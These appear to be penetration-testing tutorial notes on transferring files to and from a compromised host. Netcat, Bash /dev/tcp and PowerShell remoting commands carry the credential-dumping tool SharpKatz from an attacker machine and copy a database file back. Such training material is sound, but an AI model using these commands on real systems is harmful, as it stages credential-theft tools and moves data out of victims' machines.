Miscellaneous
Netcat
We'll first start Netcat nc on the compromised machine, listening with option -l on port 8000, with the option -p 8000, and redirect the stdout using a single greater-than > followed by the filename, SharpKatz.exe.
Compromised Machine - Listenting on Port 8000
victim@target:~$ nc -l -p 8000 > SharpKatz.exe
From our Attacker Host, we'll connect to the compromised machine on port 8000 using Netcat and send the file SharpKatz.exe as input to Netcat. The option -q 0 will tell Netcat to close the connection once it finishes. That way, we'll know when the file transfer was completed.
Attackhost - Sending File to Compromised machine
neutron@kali[/kali]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
neutron@kali[/kali]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe
Instead of listening on our compromised machine, we can connect to a port on our attackhost to perform the file transfer operation. Listen on port 80 on our attacker host and send the file SharpKatz.exe as input to Netcat.
Attackhost - Sending File as Input to Netcat
neutron@kali[/kali]$ sudo nc -l -p 80 -q 0 < SharpKatz.exe
Compromised Machine Connect to Netcat to Receive the File
victim@target:~$ nc 192.168.49.128 80 > SharpKatz.exe
If we don't have Netcat on our compromised machine, Bash supports read/write operations on a pseudo-device file /dev/TCP/.
attackhost - Sending File as Input to Netcat
neutron@kali[/kali]$ sudo nc -l -p 80 -q 0 < SharpKatz.exe
Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File
victim@target:~$ cat < /dev/tcp/192.168.49.128/80 > SharpKatz.exe
PowerShell Session File Transfer
Create a PowerShell Remoting Session to DATABASE01
PS C:\xyz> $Session = New-PSSession -ComputerName DATABASE01
Copy samplefile.txt from our Localhost to the DATABASE01 Session
PS C:\xyz> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
Copy DATABASE.txt from DATABASE01 Session to our Localhost
PS C:\xyz> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session